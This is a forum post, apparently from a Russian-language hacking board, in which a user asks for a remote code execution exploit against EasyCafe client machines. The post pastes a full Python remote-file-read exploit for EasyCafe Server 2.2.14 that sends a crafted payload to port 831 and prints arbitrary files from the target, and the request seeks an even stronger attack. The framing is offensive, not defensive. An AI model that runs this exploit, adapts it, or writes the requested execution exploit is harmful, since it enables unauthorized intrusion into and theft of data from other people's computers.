EasyCafe exploit need

Отслеживать

whobornin1990

HDD-drive
Пользователь
Регистрация
19.07.2020
Сообщения
42
Реакции
-1
hello for everyone , if you know the software Easycafe from TINASOFT ( http://www.tinasoft.com/Download/easysetup.exe ) ! i need a exploit made in python or any ! The exploit must REMOTE FILE EXECUTE from client side pc ! the software is verry old more than 15 years, and also there is a exploit, just for REMOTE FILE READ from client side !
Python: 
#!/usr/bin/python -w

# Title : EasyCafe Server <= 2.2.14 Remote File Read

# Date : 25/12/2015

# Author : R-73eN

# Tested on : Windows 7 Ultimate

# Software Link : http://www.tinasoft.com/easycafe/

# Download Link: http://www.tinasoft.com/Download/easysetup.exe

# Vulnerable Versions : EasyCafe Server <= 2.2.14

# EasyCafe Server has a feature to upload file from the server to a client.

# And the request is as following. EasyCafe Server sends an UDP request to the client with the file that wants to upload,

# Then the client receives the packet and connects to the server on port 831 and sends the directory of the file and receives it.

# The problem is that a remote attacker can connect to port 831 and can retrive a file becuase the server doesn't validate the request,

# and does not check if it has sent the UDP request which gives us full Read access to the system.

#

#EDB Note: Code my need some adjusting



import socket

#Banner

banner = ""

banner += "  ___        __        ____                 _    _  \n"

banner +=" |_ _|_ __  / _| ___  / ___| ___ _ __      / \  | |    \n"

banner +="  | || '_ \| |_ / _ \| |  _ / _ \ '_ \    / _ \ | |    \n"

banner +="  | || | | |  _| (_) | |_| |  __/ | | |  / ___ \| |___ \n"

banner +=" |___|_| |_|_|  \___/ \____|\___|_| |_| /_/   \_\_____|\n\n"

print banner







IP = "192.168.43.36" # Target IP

PORT = 831

file_to_read = "C:\\Windows\\System32\\drivers\\etc\\hosts" # File to read







s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.connect((IP, PORT))

file_to_read = "\x43" + file_to_read

hex_value = ''.join(x.encode('hex') for x in file_to_read)

fill = "\x00"

end = "\x01\x00\x00\x00\x01"

payload = hex_value.decode("hex") + fill * (261 - len(end) - len(file_to_read)) + end

s.send(payload)

s.settimeout(0)

print "[+] Request Send Waiting for Response . . . [+]"



try:

    data = s.recv(261) # Get header

    while data:

        data = s.recv(2048)

        print data

    

except Exception:

    print "[+] https://www.infogen.al/ [+]"

finally:         

    s.close()
 
У Вас недостаточно прав, чтобы здесь отвечать.
Верх